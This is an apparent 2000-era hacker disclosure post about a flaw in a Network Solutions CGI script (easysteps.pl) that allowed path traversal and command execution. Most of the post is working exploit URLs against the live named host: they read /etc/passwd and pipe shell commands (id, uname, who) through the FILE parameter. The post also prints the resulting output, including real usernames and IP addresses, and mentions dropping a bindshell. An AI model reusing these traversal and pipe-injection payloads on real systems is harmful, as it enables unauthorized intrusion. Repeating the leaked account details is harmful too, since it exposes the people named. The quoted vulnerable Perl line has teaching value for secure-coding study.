networksolutions.com: www security hole. (may/9/2000)

Major security issue with networksolutions.com(easysteps.pl).  I was in 
#r00tabega, and someone relayed this(it was told to me Mr^Chaos found the
orginal read bug):

http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=maymun.com&FILE=/../../../../../../../etc/passwd

And I so with that initial bug found, I downloaded the perl script with the bug
itself.  I noticed that a bigger problem existed:

---

open(CURR_FILE,$finalpath) or die "EASYSTEPS: Can't open file $finalpath\n";
  my @LINES = <CURR_FILE>;
close(CURR_FILE);

---

$finalpath is for the most part supplied by the user.  Knowning that open() can
be used to execute programs, I used the initial bug for this, by going to 
the root dir and then accessing the file I wanted to execute followed by the
pipe:

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/id|
return: uid=60001(nobody) gid=60001(nobody)

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/uname%20-a|
return: SunOS www1 5.6 Generic_105181-15 sun4u sparc SUNW,Ultra-Enterprise

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/who|
return: "
matthewh   pts/1        Apr 17 11:32    (216.168.238.173)
rholgado   pts/2        Apr 17 15:35    (216.168.235.124)
schauhan   pts/3        May  4 16:05    (216.168.238.21)
pvirador   pts/4        Apr 20 17:02    (216.168.238.21)
rholgado   pts/5        Apr 18 13:39    (216.168.235.124)
rholgado   pts/6        Apr 18 13:40    (216.168.235.124)
"

I decided NOT to be retarded.  But, I could have wrote a bindshell to a tmp
directory and connected.  While looking around the system I noticed some
public exploits that would have been able to get me root.

I just thought this was worth commenting on of a major corp, with
such a obvious bug. (I don't want to goto jail, I don't know about you.)

vade79[v9@fakehalo.org] -> www.fakehalo.org